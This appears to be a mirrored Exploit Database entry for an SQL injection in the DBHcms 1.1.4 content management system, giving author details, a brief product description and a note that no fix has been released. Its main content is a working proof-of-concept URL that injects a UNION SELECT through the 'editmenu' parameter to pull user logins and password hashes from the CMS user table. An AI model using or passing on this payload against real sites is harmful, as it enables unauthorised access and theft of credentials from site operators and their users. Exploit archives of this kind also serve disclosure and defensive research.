DBHcms 1.1.4 – ‘dbhcms_pid’ SQL Injection

• Exploit Database
• 7 阅读

• 作者： ZonTa
  日期： 2010-10-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15309/

• DBHcms 1.1.4 SQL Injection Vulnerability
  
  # Exploit Title:DBHcms 1.1.4 SQL Injection Vulnerability
  # Date: 24-10-2010 
  # Author: ZonTa
  # Mail: zontahackers[at]gmail[dot]com 
  # IM : zontahackers[at]live[dot]com
  
  # Software Link:http://www.drbenhur.com/downloads-dbhcms-114-1-69-en.html
  # Version: 1.1.4
  # Tested on: Apache,PHP5
  
  
  ABOUT
  --------------
  
  The DBHcms is a Open Source content management system for personal
  and small business websites. It is search engine optimized, also
  for multiple languages simultaneously by allowing the search engine
  bot to index every single page.
  
  
  POC
  --------------
  
  http://192.168.1.100/DBHcms/index.php?dbhcms_pid=-81&editmenu=-2+union+select+1,2,3,4,5,6,group_concat(user_login,0x3a,user_passwd),8,9,10,11,12,13,14+from+dbhcms_cms_users--
  
  
  FIX
  --------------
  
  Not yet released.
  
  
  Greetz to Sri Lankanz ~